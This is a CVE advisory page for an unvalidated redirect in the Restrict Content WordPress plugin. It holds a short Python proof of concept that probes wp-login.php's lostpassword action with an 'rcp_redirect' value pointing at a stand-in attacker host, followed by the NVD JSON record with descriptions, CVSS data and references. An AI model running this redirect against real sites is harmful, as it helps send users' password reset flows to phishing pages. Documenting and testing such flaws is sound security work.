CVE-2026-4136

# PoC Code for CVE-2026-4136 # Vulnerability: Unvalidated Redirect in Membership Plugin import requests def check_redirect(target, malicious_url): # The vulnerable endpoint is typically the login or password reset action url = f"{target}/wp-login.php" params = { "action": "lostpassword", "rcp_redirect": malicious_url } try: # Send request without following redirects to capture the Location header response = requests.get(url, params=params, allow_redirects=False, timeout=5) if response.status_code == 302: location = response.headers.get('Location') if location == malicious_url: print(f"[+] Vulnerable! Redirecting to: {location}") return True else: print(f"[-] Redirect found but to a different location: {location}") else: print("[-] No redirect triggered or exploit failed.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target_site = "http://example.com" # Replace with target evil_site = "http://attacker.com" check_redirect(target_site, evil_site)

{"cve": {"id": "CVE-2026-4136", "sourceIdentifier": "[email protected]", "published": "2026-03-20T04:16:50.517", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Membership Plugin – Restrict Content plugin for WordPress is vulnerable to Unvalidated Redirect in all versions up to, and including, 3.2.24. This is due to insufficient validation on the redirect url supplied via the 'rcp_redirect' parameter. This makes it possible for unauthenticated attackers to redirect users with the password reset email to potentially malicious sites if they can successfully trick them into performing an action."}, {"lang": "es", "value": "El plugin Membership Plugin – Restrict Content para WordPress es vulnerable a Redirección no validada en todas las versiones hasta la 3.2.24, inclusive. Esto se debe a una validación insuficiente en la URL de redirección suministrada a través del parámetro 'rcp_redirect'. Esto permite a los atacantes no autenticados redirigir a los usuarios con el correo electrónico de restablecimiento de contraseña a sitios potencialmente maliciosos si logran engañarlos para que realicen una acción."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-640"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.24/core/includes/login-functions.php#L270", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3486071/restrict-content", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4cf42d3-9864-440b-8357-36c82cbef28f?source=cve", "source": "[email protected]"}]}}